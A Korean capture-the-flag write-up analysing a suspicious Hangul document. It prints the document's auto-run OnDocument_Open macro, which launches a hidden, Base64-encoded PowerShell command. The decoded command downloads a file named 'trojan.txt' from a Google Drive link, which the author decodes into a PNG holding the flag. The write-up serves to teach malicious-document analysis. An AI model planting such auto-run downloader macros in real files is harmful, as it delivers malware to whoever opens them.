N0named 수상한 메일 Writeup

파일을 받으면 한글 파일을 볼 수 있다. 열어보면

무언가 스크립트를 실행하려 한다. 취소를 눌러주고 확인해보면

function OnDocument_New()
{
	//todo : 
}

function OnDocument_Open()
{
	try{
	var c = new ActiveXObject("\Script.Shell").Run("powershell.exe -noP -sta -w 1 -enc  KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vb3Blbj9pZD0xYUhQS3JjMzhLZ1lpcFlWckR1S3FrWll2OFpnN1ZiWXUnLCAndHJvamFuLnR4dCcpOyAjaSBrbm93Li4gaXQgaXMgd3JvbmcuLiBidXQgdW5kZXJzdGFuZCBpdCBwbHo6KSBnb3RvIG5leHQgc3RlcCBodHRwczovL2RyaXZlLmdvb2dsZS5jb20vb3Blbj9pZD0xYUhQS3JjMzhLZ1lpcFlWckR1S3FrWll2OFpnN1ZiWXU=");
	}catch(err){};
}

 

무언가 실행하려고 한다. 끝을 보니 =로 끝나는 것으로 보아 Base64 인코딩으로 생각하고 디코딩했다.

 

(New-Object Net.WebClient).DownloadFile('https://drive.google.com/open?id=1aHPKrc38KgYipYVrDuKqkZYv8Zg7VbYu', 'trojan.txt'); 
#i know.. it is wrong.. but understand it plz:) 
goto next step https://drive.google.com/open?id=1aHPKrc38KgYipYVrDuKqkZYv8Zg7VbYu

이러한 내용이 적혀있다. 드라이브 주소를 들어가보면

뭐가 거대하게 적혀있다. 처음 일부분만 가지고 와서 Base64 디코딩을 해보니

89 50 4E 47 0D 0A 1A 0A, PNG 파일의 Signature 였다. 전부 decode해서 옮겨서 png 파일로 만들어주어 플래그를 확인할 수 있었다.